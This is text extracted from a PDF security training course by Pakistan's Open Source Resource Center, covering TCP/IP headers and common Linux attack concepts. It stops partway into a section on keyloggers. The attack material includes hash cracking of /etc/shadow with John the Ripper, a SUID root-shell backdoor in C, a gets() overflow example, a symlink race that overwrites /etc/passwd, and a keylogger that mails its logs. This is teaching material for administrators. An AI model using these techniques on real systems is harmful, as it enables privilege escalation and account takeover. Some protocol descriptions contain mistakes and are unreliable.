Open Source Security Tools Training Tool Kit

7/30/2019 Open Source Security Tools Training Tool Kit

1/120

Open Source Security Tools

1


2/120

Introduction

The Open Source Resource Center (OSRC) is a project of the Pakistan Software Export Board (PSEB),

Ministry of Information Technology. It aims to promote and support open source initiatives in the

country through awareness-raising seminars, training workshops and network migrations.

Most of security breaches occur because of the lack of awareness and ignorance of security policies and

management. Most of these breaches can be prevented if the system and network is configured with some

basic security mechanism.

This training toolkit is to develope an awareness of basic Security concepts with a focus on using open

source security tools.

The training program targets network and system administrator, System and network support staff, and

officers of different organizations such as banking, telecom, BPO, IT etc and students with basicknowledge of system administration.

2


3/120

Acknowledgements and Feedback

My thanks to OSRC's Mr. Shah Mansoor for developing this course.

This course has been edited by OSRC's Content Writer, Ms. Seema Javed Amin.

The OSRC looks forward to your feedback regarding both the course and the training program, and looks

forward to improving them in the future.

Thank you.

Khurram Islam Khan

Project Manager (Open Source Resource Center)

3


4/120

Contents

Sr. No Description Page

1. TCP/IP in Depth

Internet ProtocolTCP

UDP

ICMP

5

513

17

18

2. Security ConceptsExploits And Vulnerabilities

Weak Passwords

SUID Binarries

Buffer Overflows

Race Conditions

Viruses and WormsKeyLogging

Trojans And Backdoors

Rootkits

Attacks Against Network

TCP/IP Attacks

22

22

22

23

24

29

3031

33

37

47

52

3. Open Source FirewallsIptables

Smoothwall

Ipcop

60

61

66

72

4. Open Source VPNsIpsec Based VPNs

Ipsec An Overview

Ipsec Implementation On Linux

74

74

74

78

5. Open Source Scanners and sniffersPort Scanners

Nmap

Vulnerability Scanners

Nessus

Network Sniffers

Wireshark

87

87

90

95

95

101

101

6. Open Source IDS

Snort

103

104

4


5/120

TCP/IP In Depth

Internet Protocol (IP)

The Internet Protocol (IP) part of the TCP/IP suite is a four-layer model (Figure 1.1). An IP is

designed to interconnect networks to form an Internet to pass data back and forth. It contains

addressing and control information that enables packets to be routed through this Internet. A

packet is defined as a logical grouping of information, which includes a header containing

control information and, usually, user data.

The equipment that encounters these packets, known as routers, strips off and examines the

headers that contain the sensitive routing information. These headers are modified and

reformulated as a packet to be passed along.

One of the IPs primary functions is to provide a permanently-established connection (termed

connectionless), unreliable, best-effort delivery of datagrams through an Internetwork.

Datagrams can be described as a logical grouping of information sent as a network layer unit

over a communication medium. IP datagrams are the primary information units in the Internet.

Another of the IPs principal responsibilities is the fragmentation and reassembly of datagrams

to support links with different transmission sizes.

Application

Transmission Control Protocol

Internet Protocol

Network Address

Figure 1.1 The four-layer TCP/IP model

5


6/120

4 8 16 19 24 31

Version Length Type of Service Total Length

Identification Flags Fragment Offset

Time to Live Protocol Header Checksum

Source Address

Destination Address

Options

Data

Figure 1.2 An IP Packet

An IP packet contains the following fields illustrated in Figure 1.2:

Version: The IP version currently used.

IP Header Length (Length): The datagram header length in 32-bit words .

Type-of-Service (ToS): How the upper-layer protocol (the layer immediately above,

such as transport protocols like TCP and UDP) intends to handle the current datagram

and assign a level of importance .

Total Length: The length, in bytes, of the entire IP packet .

6


7/120

Identification: An integer used to help piece together datagram fragments .

Flag: A 3-bit field, where the first bit specifies whether the packet can be fragmented.

The second bit indicates whether the packet is the last fragment in a series. The final bit

is not used at this time.

Fragment Offset: The location of the fragments data, relative to the opening data in the

original datagram. This allows for proper reconstruction of the original datagram.

Time-to-Live (TTL): A counter that decrements to zero to keep packets from endlessly

looping. The packet is dropped at the zero mark .

Protocol: Indicates the upper-layer protocol receiving the incoming packets .

Header Checksum: Ensures the integrity of the IP header .

Source Address/Destination Address: The sending and receiving nodes (station,

server, and/or router) .

Options: Contains security options .

Data: Upper-layer information .

Internet Protocol, Src: 203.215.161.166 (203.215.161.166), Dst: 92.122.208.208

(92.122.208.208)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

0000 00.. = Differentiated Services Codepoint: Default (0x00)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 480

Identification: 0x0967 (2407)

Flags: 0x04 (Don't Fragment)

0... = Reserved bit: Not set

.1.. = Don't fragment: Set

7


8/120

..0. = More fragments: Not set

Fragment offset: 0

Time to live: 64

Protocol: TCP (0x06)

Header checksum: 0x94e8 [correct]

[Good: True]

[Bad : False]

Source: 203.215.161.166 (203.215.161.166)

Destination: 92.122.208.208 (92.122.208.208)

Internet Protocol, Src: 168.143.106.100 (168.143.106.100), Dst: 203.215.161.166

(203.215.161.166)

Version: 4

Header length: 20 bytes

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

0000 00.. = Differentiated Services Codepoint: Default (0x00)

.... ..0. = ECN-Capable Transport (ECT): 0

.... ...0 = ECN-CE: 0

Total Length: 84

Identification: 0x8a2e (35374)

Flags: 0x00

0... = Reserved bit: Not set

.0.. = Don't fragment: Not set

..0. = More fragments: Not set

Fragment offset: 0

Time to live: 54

Protocol: ICMP (0x01)

Header checksum: 0x7a09 [correct]

[Good: True]

[Bad : False]

Source: 168.143.106.100 (168.143.106.100)

Destination: 203.215.161.166 (203.215.161.166)

IP Datagrams, Encapsulation, Size, and Fragmentation

IP datagrams are the very basic, or fundamental, transfer unit of the Internet. An IP datagram is

8


9/120

the unit of data commuted between IP modules. IP datagrams have headers with fields that

provide routing information used by infrastructure equipment such as routers (Figure 1.3):

Data for Upper Layer

IP Header IP Data

Data Link Header Data Link DataFrame Check

Segments

Figure 1.3 An IP Datagram

The data in a packet is not really a concern for the IP. Instead, IP is concerned with the control

information as it pertains to the upper-layer protocol. This information is stored in the IP header,

which tries to deliver the datagram to its destination on the local network or over the Internet.

Think of IP as the method and the datagram as the means.

It is important to understand the methods a datagram uses to travel across networks. To

sufficiently travel across the Internet, over physical media, we want some guarantee that each

datagram travels in a physical frame. The process of a datagram traveling across media in a

frame is called encapsulation.

One problem with a traveling datagram is that networks enforce a Maximum Transfer Unit

(MTU) size, or limit, on the size of transfer. To further confuse the issue, different types of

networks enforce their own MTU; for example, Ethernet has an MTU of 1500, FDDI uses 4470

MTU, and so on. When datagrams traveling in frames cross network types with different

specified size limits, routers must sometimes divide the datagram to accommodate a smaller

MTU. This process is known as fragmentation.

ARP/RARP Engineering: Introduction to Physical Hardware

Address Mapping

We need to discover how a host station or infrastructure equipment, such as a router, matches

9


10/120

an IP address to a physical hardware address. Every interface, or Network Interface Card

(NIC), in a station, server, or infrastructure equipment has a unique physical address that is

programmed by, and bound internally by, its manufacturer.

One goal of infrastructure software is to communicate using an assigned IP or Internet address,

while hiding the hardwares unique physical address. Underneath all of this is the address

mapping of the assigned address to the actual physical hardwares address. Programmers use

the Address Resolution Protocol (ARP) to map these addresses.

ARP is basically a packet that is broadcasted to all hosts attached to a physical network. This

packet contains the IP address of the node or station with which the sender wants to

communicate. Other hosts on the network ignore this packet after storing a copy of the senders

IP/hardware address mapping. The target host, however, will reply with its hardware address,

which will be returned to the sender, to be stored in its ARP response cache. These two nodes

can now communicate with each other.

ARP Encapsulation and Header Formatting

It is important to know that ARP is not an Internet protocol; moreover, ARP does not leave the

local logical network, and therefore does not need to be routed.

Rather, ARP must be broadcasted, whereby it communicates with every host interface on the

network, traveling from machine to machine encapsulated in Ethernet packets (in the data

portion).

Figure 1.4 illustrates the encapsulation of an ARP packet, including the Reverse Address

Resolution Protocol (RARP). The packets components are defined in the following list:

10


11/120

Type of Service Type of Protocol

Hardware Length Protocol Length Operation Field

ARP Sender's Hardware Address (0-3 Octets)

ARP Sender's Hardware Address (4-5 Octets) ARP Sender's IP Address (0-1 Octets)

ARP Sender's IP Address (2-3 Octets) RARP Target's Hardware Address (0-1 Octets)

RARP Target's Hardware Address (2-5 Octets)

RARP Target's IP Address (0-3 Octets)

Figure 1.4 An ARP/RARP Packet

Type of Hardware: Specifies the target hosts hardware interface type (1 for Ethernet) .

Type of Protocol: The protocol type the sender has supplied (0800 for an IP address) .

Hardware Length: The length of the hardware address .

Protocol Length: The length of the protocol address .

Operation Field: Specifies whether either an ARP request/response or RARP

request/response .

ARP Senders Hardware Address: Senders hardware address .

ARP Senders IP Address: Senders IP address .

11


12/120

RARP Targets Hardware: Targets hardware address .

RARP Targets IP Address: Targets IP address .

ARP packets do not have a defined header format. The length fields shown in Figure 1.4 enable

ARP to be implemented with other technologies.

Reverse Address Resolution Protocol (RARP) Transactions,

Encapsulation.

The Reverse Address Resolution Protocol (RARP) is, to some degree, the opposite of ARP.

Basically, RARP allows a station to broadcast its hardware address, expecting a server daemon

to respond with an available IP address for the station to use. Diskless machines use RARP to

obtain IP addresses from RARP servers.

It is important to know that RARP messages, like ARP, are encapsulated in Ethernet frames.

Likewise, RARP is broadcast from machine to machine, communicating with every host

interface on the network.

ARP Sender's IP Address (2-3 Octets) RARP Target's Hardware Address (0-1 Octets)

RARP Target's Hardware Address (2-5 Octets)

RARP Target's IP Address (0-3 Octets)

Figure 1.5

RARP Service

The RARP daemon (RARPd) is a service that responds to RARP requests. Diskless systems

typically use RARP at boot time to discover their 32-bit IP address, given their 48-bit hardware

Ethernet address. The booting machine sends its Ethernet address, encapsulated in a frame as

a RARP request message. The server running RARPd must have the machines name-to-IP-

address entry, or it must be available from the Domain Name Server (DNS) with its name-to-

12


13/120

Ethernet-address. With these sources available, the RARPd server maps this Ethernet address

with the corresponding IP address.

Note:

RARP, with ARP spoofing, gives a hacker the ability to passively request an IP address, and to

passively partake in network communications, typically unnoticed by other nodes.

Transmission Control Protocol (TCP)

IP has many weaknesses, one of which is unreliable packet delivery - packets may be dropped

due to transmission errors, bad routes, and/or throughput degradation. The Transmission

Control Protocol (TCP) helps reconcile these issues by providing reliable, stream-oriented

connections. In fact, TCP/IP is predominantly based on TCP functionality, which is based on IP,

to make up the TCP/IP suite. These features describe a connection-oriented process ofcommunication establishment.

Many components result in TCPs reliable service delivery. The following are some of the main

points:

Streams

Data is systematized and transferred as a stream of bits, organized into 8-bit octets or bytes. As

these bits are received, they are passed on in the same manner.

Buffer Flow Control

As data is passed in streams, protocol software may divide the stream to fill specific buffer

sizes. TCP manages this process, and assures avoidance of a buffer overflow. During this

process, fast-sending stations may be stopped periodically to keep up with slow-receiving

stations.

Virtual Circuits

When one station requests communication with another, both stations inform their application

programs, and agree to communicate. If the link or communications between these stations fail,

13


14/120

both stations are made aware of the breakdown and inform their respective software

applications. In this case, a coordinated retry is attempted.

Full Duplex Connectivity

Stream transfer occurs in both directions, simultaneously, to reduce overall network traffic.

Sequencing and Windowing

TCP organizes and counts bytes in the data stream using a 32-bit sequence number. Every

TCP packet contains a starting sequence number (first byte) and an acknowledgment number

(last byte). A concept known as a sliding window is implemented to make stream transmissions

more efficient. The sliding window uses bandwidth more effectively, because it will allow the

transmission of multiple packets before an acknowledgment is required.

Figure 1.6

Figure 1.6 is a real-world example of the TCP sliding window. In this example, a sender has

bytes to send in sequence (1-8) to a receiving station with a window size of 4. The sending

14


15/120

station places the first 4 bytes in a window and sends them, then waits for an acknowledgment

(ACK=5). This acknowledgment specifies that the first 4 bytes were received. Then, assuming

its window size is still 4 and that it is also waiting for the next byte (byte 5), the sending station

moves the sliding window 4 bytes to the right, and sends bytes 5-8. Upon receiving these bytes,

the receiving station sends an acknowledgment (ACK=9), indicating that it is waiting for byte 9.

And the process continues.

The receiver may indicate a window size of 0 at any point, in which case the sender will not

send any more bytes until the window size is greater. A typical cause for this occurring is a

buffer overflow.

TCP Packet Format and Header Snapshots

Keeping in mind that it is important to differentiate between captured packets - whether they areTCP, UDP, ARP, and so on - look at the TCP packet format in Figure 1.7, whose components

are defined in the following list:

Source Port Destination Port

Sequence Number

Acknowledgment Number

Data Offset Reserved Flags Window Size

Checksum Urgent Pointer

Options

Data

Figure 1.7

15


16/120

Source Port: Specifies the port at which the source processes send/receive TCP

services .

Destination Port: Specifies the port at which the destination processes send/receive

TCP services .

Sequence Number: A 32-bit number identifying the current position of the first data byte

in the segment within the entire byte stream for the TCP connection. After reaching 232

-1, this number will wrap around to 0 .

Acknowledgment Number: If the ACK bit is set, this field contains the value of the next

sequence number the segments sender expects to receive .

Data Offset: A 4-bit field that specifies the total TCP header length in 32-bit words.Without options, a TCP header is always 20 bytes in length. The largest a TCP header

may be is 60 bytes. This field is required because the size of the options field(s) cannot

be pre-determined .

Reserved: Held for future use .

Flags: Control information, such as SYN, ACK, and FIN bits, for connection

establishment and termination .

Window Size: This number tells the sender how much data the receiver is willing to

accept .

Checksum: Specifies any damage to the header that occurred during transmission .

Urgent Pointer: In certain circumstances, it may be necessary for a TCP sender to

notify the receiver about urgent data that should be processed by the receiving

application as soon as possible. This 16-bit field tells the receiver when the last byte ofurgent data in the segment ends .

Options: A TCP sender and receiver may use several optional parameters in order to

provide additional functionality. The length of this field will vary in size, depending on the

16


17/120

option(s) used, but it cannot be larger than 40 bytes due to the size of the header length

field (4 bits). The most common option is that of Maximum Segment Size (MSS). A TCP

receiver tells the TCP sender the MSS it is willing to accept through the use of this

option. Other options are often used for various flow control and congestion control

techniques .

Data: Upper-layer information .

User Datagram Protocol (UDP)

The User Datagram Protocol (UDP) operates in a connectionless fashion; it provides the same

unreliable datagram delivery service as IP. Unlike TCP, UDP does not send SYN/ACK bits to

assure delivery and reliability of transmissions. Moreover, UDP does not include flow control or

error recovery functionality. Consequently, UDP messages can be lost, duplicated, or arrive inthe wrong order. And because UDP contains smaller headers, it expends less network

throughput than TCP, and can arrive faster than the receiving station can process them.

UDP is typically utilized where higher-layer protocols provide necessary error recovery and flow

control. Popular server daemons that employ UDP include Network File System (NFS), Simple

Network Management Protocol (SNMP), Trivial File Transfer Protocol (TFTP), and Domain

Name System (DNS), etc.

UDP Formatting, Encapsulation, and Header Snapshots

UDP messages are known as user datagrams. These datagrams are encapsulated in IP,

including the UDP header and data, as it travels across the Internet. Basically, UDP adds a

header to the data that a user sends, and passes it along to IP. The IP layer then adds a

header to what it receives from UDP. Finally, the network interface layer inserts the datagram in

a frame before sending it from one machine to another.

As previously mentioned, UDP messages contain smaller headers and consume fewer

overheads than TCP.

The UDP datagram format is shown in Figure 1.8, and its components are defined in the list

that follows:

17


18/120

Source Port Destination Port

Message Length Checksum

Data

Figure 1.8

Source/Destination Port: A 16-bit UDP port number used for datagram processing .

Message Length: Specifies the number of octets in the UDP datagram .

Checksum: An optional field to verify datagram delivery .

Data: The data handed down to the TCP protocol, including upper-layer headers.

Internet Control Message Protocol (ICMP)

The Internet Control Message Protocol (ICMP) delivers message packets, and reports errors

and other pertinent information to the sending station or source. Hosts and infrastructureequipment use this mechanism to communicate control and error information as pertains to IP

packet processing.

ICMP Format, Encapsulation, and Delivery

ICMP message encapsulation is a two-fold process. The messages are encapsulated in IP

datagrams, which are encapsulated in frames, as they travel across the Internet. Basically,

ICMP uses the same unreliable means of communications as a datagram. This means that

ICMP error messages may either be lost or duplicated.

The ICMP format includes a message type field, indicating the type of message; a code field

that includes detailed information about the type; and a checksum field, which provides the

same functionality as IPs checksum.

18


19/120

When an ICMP message reports an error, it includes the header and data of the datagram that

caused the specified problem. This helps the receiving station understand which application

and protocol sent the datagram.

Message Type Code Checksum

Figure 1.9

Message Types:

Message Type Description

0 Echo Reply

3 Destination Unreachable

4 Source Quench

5 Route Redirect

8 Echo Request

11 Datagram Time Exceeded

12 Datagram Parameter Problem

13 Timestamp Request14 Timestamp Reply

15 Information Request

16 Information Reply

17 Address Mask Request

18 Address Mask Reply

Figure 1.10 ICMP Message Chart

There are many types of useful ICMP messages. Figure 1.10 contains a list of several, which

are described in the following list:

19


20/120

Echo Reply (Type 0)/Echo Request (Type 8): The basic mechanism for testing

possible communication between two nodes. The receiving station, if available, is asked

to reply to the ping .

Destination Unreachable (Type 3): There are several issuances for this message

type, including when a router or gateway does not know how to reach the destination,

when a protocol or application is not active, when a datagram specifies an unstable

route, or when a router must fragment the size of a datagram and cannot because the

Dont Fragment Flag is set .

Source Quench (Type 4): A basic form of flow control for datagram delivery. When

datagrams arrive too quickly at a receiving station to process, the datagrams are

discarded. During this process, for every datagram that has been dropped, an ICMP

Type 4 message is passed along to the sending station. The Source Quench messagesactually become requests, to slow down the rate at which datagrams are sent.

Route Redirect (Type 5): Routing information is exchanged periodically to

accommodate network changes and to keep routing tables upto date. When a router

identifies a host that is using a non-optional route, the router sends an ICMP Type 5

message while forwarding the datagram to the destination network. As a result, routers

can send Type 5 messages only to hosts directly connected to their networks .

Datagram Time Exceeded (Type 11): A gateway or router will emit a Type 11message if it is forced to drop a datagram because the TTL (Time-to-Live) field is set to

0 .

Datagram Parameter Problem (Type 12): Specifies a problem with the datagram

header that is impeding further processing. The datagram will be discarded, and a Type

12 message will be transmitted .

Timestamp Request (Type 13)/Timestamp Reply (Type 14): These provide a means

for delay tabulation of the network. The sending station injects a send timestamp (the

time the message was sent) and the receiving station will append a receive timestamp to

compute an estimated delay time and assist in their internal clock synchronization .

Information Request (Type 15)/Information Reply (Type 16): As an alternative to

20


21/120

RARP (described previously), stations use Type 15 and Type 16 to obtain an Internet

address for a network to which they are attached. The sending station will emit the

message, with the network portion of the Internet address, and wait for a response, with

the host portion (its IP address) filled-in .

Address Mask Request (Type 17)/Address Mask Reply (Type 18): Similar to an

Information Request/Reply, stations can send Type 17 and Type 18 messages to obtain

the subnet mask of the network to which they are attached. Stations may submit this

request to a known node, such as a gateway or router, or broadcast the request to the

network tp://www.google.com/.

21


22/120

Security Concepts

Exploits and Vulnerability

The following are some of the common ways in which an initial compromise can occur,

including weak passwords, SUID binaries, and buffer overflows.

Weak Passwords

The simplest and still one of the most effective vulnerabilities in Linux is the use of weak or non-

existent passwords. An administrator may be well-versed in the art of choosing complicated

passwords, but what about users? Many users choose simple passwords, which threaten the

security of the whole system.

Most applications store user passwords using some form of encryption or hashing, but it is still

essential to limit access to them as much as possible because of the risk of password-cracking.

Modern hash methods such as MD5 are one-way: no mathematical formula can be applied to

convert an encrypted password back to its original plain text. Instead, programs such as login

hash the password entered by the user, and compare this with the user's hashed password in

/etc/shadow. If the two hashed passwords are identical, the two plain text passwords must also

be identical, and the user is logged into the system. Unless there is a weakness in this method,

which allows an algorithm to be used to crack a password (and occasionally such weaknessesare found), the only way to discover the plain text version of a hash is to hash every possible

sequence of characters until a match is found.

Ninety-eight different characters can be used to form passwords for accounts on Linux systems;

with a four-character password, for example, there are more than 90 million possible

combinations (98^4). This might seem like a lot, but on a modest 1 GHz machine, a four-

character password hashed with MD5 can be cracked in under an hour. A five-character

password can take up to three days, and a six-character password can take up to a little under

one year. These are worst-case scenarios for an attacker. Many people just use lowercase

letters for their passwords, and, if a cracker limits his permutations to just lowercase, a six-

character password can be cracked within a day. These rough calculations also fail to account

for the fact that a cracker may have dozens of machines at his disposal; with a combined

processing power of 10 GHz, these figures can be reduced by a factor of 10.

22


23/120

John the Ripper

John the Ripper is a fast and highly flexible UNIX password cracker. It is available for UNIX,

DOS, and Windows.

After installing, enter the run directory, and (as root) use the unshadow binary to generate an

unshadowed version of /etc/passwd:

# ./unshadow /etc/passwd /etc/shadow > passwd.1

Use the simplest cracking method for the first time, and more advanced features later if the

standard method does not produce any results.

$ ./john passwd.1

Loaded 7 passwords with 3 different salts (FreeBSD MD5 [32/32])

letmein (apollo)

testtest (zeus)

guesses: 2 time: 0:00:00:04 4% (1) c/s: 1028 trying: Crystal1

Session aborted

For more persistent passwords, use the -w option to perform dictionary-based cracking:

$ ./john -w:/usr/share/dict/words passwd.1

suid Binaries

Sometimes an ordinary user needs access to parts of the system usually accessible only by

root, to change his password or default shell, for example. UNIX systems implement this by

using the setuserid (SUID) flag, which causes an executable file to run with the permissions of

its owner, not with those of the user invoking it.

One such example is the XFree86 binary, which needs access to probe hardware - a privilege

normally only granted to root. By setting the SUID flag on /usr/X11R6/ bin/XFree86, regular

users can launch X. Closely related to the SUID attribute, is SGID (set group id). The principle

is the same, only this time the file executes as the group that owns it. The SGID attribute is

23


24/120

commonly used for games keeping a global score file. The game must be able to write to the

score file no matter who is playing it, but, at the same time, users should not be allowed to

tamper with the scores. SUID and SGID files can be spotted by examining a file's attributes, via

the ls command, using the -l switch ("long") for more verbose output:

-rws-x-x 1 root bin 1720796 Mar 2 2003 \

/usr/X11R6/bin/XFree86

-r-xr-sr-x 1 root games 31916 Feb 13 2003 /usr/bin/glines

In the first example, the s in the owner-executable positions indicates the file is SUID, whereas

in the second example, the s flag in the group-executable position indicates that the file is

SGID. With a cracker having access to run a binary as root, the opportunity for abuse is high.

Races and buffer overflows (both discussed later) are possibilities, as are attacks based on

unexpected input, or tarnished environmental variables. In fact, SUID shell scripts are

considered so dangerous that Linux refuses to honor the SUID bit on them.

Aside from the potential for abuse in legitimate SUID programs, a cracker who has gained root

access may set the SUID flag on a binary as a means of regaining super-user privileges.

Previously, the typical method was to rename a SUID copy of /bin/sh and hide it in a directory

such as /tmp. By executing this binary, the user was then dropped into a rootshell, and was

able to execute privileged commands. Shells supplied with recent versions of Linux fixed this

problem by dropping all SUID/SGID privileges, but an attacker can still create a SUID backdoor

by using a small C wrapper program to launch the shell. Compiling the following program, andsetting the SUID bit causes it to spawn a rootshell when executed as an unprivileged user:

#include

main () {

setuid(0);

system("/bin/bash");

}

The Buffer Overflow

The Basics

24


25/120

Linux divides physical memory (RAM) into 4 KB blocks, called pages, each with a unique

number. The first step in executing a program is to load it into memory, so the kernel allocates

one or more pages to the process, keeping track of which page is in use by which program in

an internal table. Paged memory uses relative addressing; all data in the page is referenced

relative to the start of the page. This frees the process from having to worry about its exact

location in memory.

Memory used by the process is divided into three distinct blocks:

Text Region:

This contains instructions and read-only data. There should be no need to modify the data here,

it is, therefore, marked as read-only, and any attempt to write to it generates a segmentation

violation.

Data Region:

Both static and dynamic data is stored here. Its size may be changed, if necessary, and the

data stored here is shared - other processes may freely access it.

Stack Region:

This is used to store dynamic data, such as variables passed between functions. This is themost important region for you to consider.

These three regions are shown in Figure 2.1

25


26/120

Low Memory

Text

Data

Stack

Figure 2.1 High Memory

The Stack

Stacks are a method of storing data in which newly-added items are placed "on top" of existing

items. When you retrieve data from a stack, the most recently-added item is accessed first. The

common analogy is that of dinner plates. Imagine that you work a restaurants kitchen. When

the chef asks for a plate, you take one off the top of the pile; and when a plate has been

washed and dried, you place it on the top of the pile. In computer science-speak, you push and

pop the plates, and the system is described as First In, Last Out (FILO) or Last In, First Out

(LIFO).

A stacks size is dynamic, with the kernel capable of increasing or decreasing its size during

runtime. The bottom of the stack is at a fixed address (usually the end of the page), and a Stack

Pointer (SP) is used to point to the top of the stack. So why are stacks so important to

crackers? All high-level programming languages (such as C/C++, Java, Perl, and Python) use

functions. Some languages refer to them as subroutines or procedures, but they are all

essentially the same thing. A function is an abstract concept, and passing data between

functions is implemented by using a stack. When a function is called, its parameters are pushed

onto the stack in reverse order. Next comes the Return Address (RET) - the address execution

should jump back to after the function has finished - followed by a Frame Pointer (FP), and,

finally, any automatic local variables:

26


27/120

Local Variables FT RET Parameters

Figure 2.2: Stack layout during a function call

Let's look at an example:

void test(int a, int b, int c) {

char buffer1[5];

char buffer2[10];

}

void main() {

test(1,2,3);

}

Figure 2.3 shows how the stack looks when the function test is called:

Buffer2 Buffer1 FT RET a b c

3AFOB15E388CF2 9BA299FB38C 29C3D 115E3C

Figure 2.3 Local variables for function test Parameters passed

to function test

On 32-bit machines, a word is 4 bytes, and memory must be addressed in multiples of words.

So buffer1 is allocated 8 bytes, and buffer2 12 bytes.

The Overflow

In the previous example, a fixed amount of storage space has been allocated for the two

character arrays buffer1 and buffer2, but what happens if you attempt to store more data in

them than was initially allocated? Here's another example:

void test(char *str) {

char buffer[10];

strcpy(buffer,str);

}

void main() {

char large_string = 'AAAAAAAAAAAAAAAAAAAAA'; // 20 byte long

27


28/120

test(large_string);

}

Executing this code causes a segmentation fault (SEG fault). In order to understand why, look

at the contents of the stack when the function test is called:

Buffer FP RET *str

AAAAAAAAAAAA AAAA AAAA

Figure 2.4. The buffer overflows, causing RET to be overwritten

12 bytes have been allocated for the buffer (because it must be a multiple of the word size), but

large_string is 20 bytes long. As shown in Figure 2.4, when str is copied into the buffer, the

extra data spills over - in this case, clobbering FP and RET (both 4 bytes wide). The character

A has a hex value of 0x41, meaning the return address is now 0x41414141. When the function

ends, the process attempts to jump to this address, and, because it is out of range, a

segmentation fault is generated. This is a pretty annoying problem - an easy mistake - that

stems from the fact that functions such as strcpy do not perform any boundary-checking. To a

cracker, however, this is a good situation, because it allows him to change the program's flow of

execution. Consider the following program, which reads user input into an array:

void function (void) {

char small[30];gets (small);

}

void main() {

function();

}

With gets() providing no boundary-checking, a user can easily overflow the buffer (whether

intentionally or not), causing the return address to change, and execution to jump to another

area of the process's memory. In some cases, the attacker may use this to bypass certainsections of the program (such as a function that validates an entered password before

continuing), but he would most probably want to spawn a shell. So the next question pertains to

how the attacker may force commands of his choice to be executed. The solution is elegantly

simple: place the commands into the buffer you are overflowing, and overwrite the return

28


29/120

address so that it points back to the beginning of the buffer.

Race Conditions

We tend to think of a program's actions as occurring atomically, i.e., in one unit. In reality, a

finite time-gap exists between each statement being executed. Consider the following Perl

script, which imposes the Bash shell onto /bin/sh users:

open (IN, "< /etc/passwd") || die $!;

chomp (@lines = );

close IN;

open (OUT, "> /etc/passwd") || die $!;

flock (OUT, LOCK_EX) or die "Can't lock /etc/passwd: $!";

foreach (@lines) {print OUT ($_ =~s/ \/bin\/sh$/ \/bin\/bash/), "\n";

}

close OUT;

In Lines 1-3, /etc/passwd is opened and read into an array, removing the trailing \n from the end

of each line. Having reopened /etc/passwd for writing on Line 7, a foreach loop then iterates

through each line of the array, substituting any occurrences of /bin/sh for /bin/bash, and writing

the output. But what happens if another legitimate process attempts to modify /etc/passwd while

this program is running? Any changes made by the other process will simply be clobbered as

the contents of @lines are written out. This constitutes a race condition: two or more processes

simultaneously accessing the same resource, usually a file, the outcome being dependent on

which process gets there first. This may seem like more of a theoretical risk - the time delay

between two sequential commands being executed is very small - but the problem is

compounded by the Linux kernels multitasking nature. One of the kernel's jobs is to juggle CPU

time between each running process, creating an illusion that they are all running

simultaneously. It does this by allocating each process a slice of the CPU time (in fact, they are

called timeslices), the size of the slice depending on the priority of the process. After this timehas expired, execution switches to the next task. Userland programs have no way of controlling

this, so it is possible that execution may pause in the middle of a sequence of commands such

as:

if (access("/tmp/tempfile", R_OK)==0) {

29


30/120

fd=open("/tmp/datafile");

....

The time during which a race condition such as this may occur is referred to as the window of

vulnerability. Red Hat diskcheck Race the Red Hat PowerTools Suite (Versions 6.0 - 7.0)

contains a program, diskcheck.pl, which checks disk usage on an hourly basis, and notifies the

administrator if the filesystem is becoming full. The generated e-mail is first written to a

temporary file in /tmp named diskusagealert.txt.$$, where $$ represents the pid of the process.

Because an attacker can predict what the temporary filename will be (by looking in the process

list while diskcheck.pl is running), it now becomes possible for him to clobber a file for which he

has no write access, via a symbolic link. For example:

ln -s /etc/passwd /tmp/diskusagealert.txt.22401

Now when diskcheck.pl (which is running as root), attempts to open /tmp/

diskusagealert.txt.22401, it ends up opening /etc/passwd instead, overwriting user account

details in the process. Nobody will be able to log into the system until the administrator repairs

the damage. Race conditions can be difficult to win because of the timing involved - it may be

necessary to run the race several hundred times before achieving success. The most profitable

programs to exploit are typically those running SETUID, because the cracker may launch them

as many times as necessary.

Viruses and Worms

The commonly accepted difference between viruses and worms is that while viruses require

user intervention to spread, such as a user opening a malicious e-mail attachment, worms self-

propagate. Both may or may not contain a payload, but even in the absence of one, the amount

of network traffic generated can still cause considerable damage, especially in the case of

worms.

UNIX in general and Linux in particular have been lucky so far, with few viruses or worms beingreported. Some have cited Linuxs strong multiuser model as one reason, because it makes it

difficult for viruses to spread. Others have attributed it to the tradition of freely available source

code, allowing any malicious code to be quickly discovered. Many more say that the relatively

low percentage of Linux users (compared to, say, Windows) also indicates that there is little

interest in developing Linux viruses.

30


31/120

One interesting difference between the viruses and worms affecting Linux and those affecting

Windows is the payload. Windows viruses delete files and render the system unusable. In

Linux, the trend seems to be towards a payload that benefits the viruss creator, such as

allowing the machine to be used as part of a distributed DoS attack. This is not always the

case, but this behavior has been observed in a large proportion of the viruses seen under

Linux.

The Morris Worm

The world's first major computer worm was launched in November 1988. Written by Robert

Morris, a Cornell University student, the Morris worm exploited known vulnerabilities in

Sendmail and Fingerd and spread quickly across the Internet (which, in 1988, was still made up

of mainly universities and government/military institutions). The worm's first line of attack was toconnect to a remote machine's Sendmail server. By invoking debug mode, commands could be

piped directly to the shell - in this case, a small C program that connected back to the attacking

machine - and transferred across the rest of the files. If the Sendmail exploit failed, the worm

used a buffer overflow in the finger daemon to achieve the same result. With the worm now

running on the victim host, the cycle repeated, with a twist: Remote Shell (RSH) and Remote

Execute (REXEC), which use host-based authentication, offered a third way of propagating the

worm. By brute-forcing /etc/passwd (using /usr/ dict/words as the wordlist), the worm could

assume the identity of other users, and log into other machines. The Internet was a more

trusting place back then, and the worm, which was released into the wild at MIT in an attempt to

disguise its origin, spread at a rate that alarmed even Morris. A mistake in the code also meant

that the worm could infect the same machine multiple times. The majority of the damage

inflicted was a result of servers grinding to their knees as they attempted to execute multiple

instances of the worm. History has been kind to the nave Robert Morris. Today's virus writers

are generally considered the lowest of the low, and many hackers feel a certain empathy

toward Morris, perhaps seeing a little of their own sense of mischief and curiosity in him.

Certainly Morris' intentions were not malicious - the worm contained no payload; its only

purpose was to replicate and spread. A full analysis of the Morris worm is available athttp://www.worm.net.

31
http://www.worm.net/http://www.worm.net/


32/120

Key Logging

The best encryption in the world is useless if an attacker can silently log keystrokes typed at the

keyboard. In Linux, keyloggers are available that run either in userspace (as a regular program)

or kernelspace (as a kernel module). Here is lkl in action:

# lkl -m pete@localhost -l -k keymaps/us_km

=

Started to log port 0x60. Keymap is keymaps/us_km. The logfile

is (null).

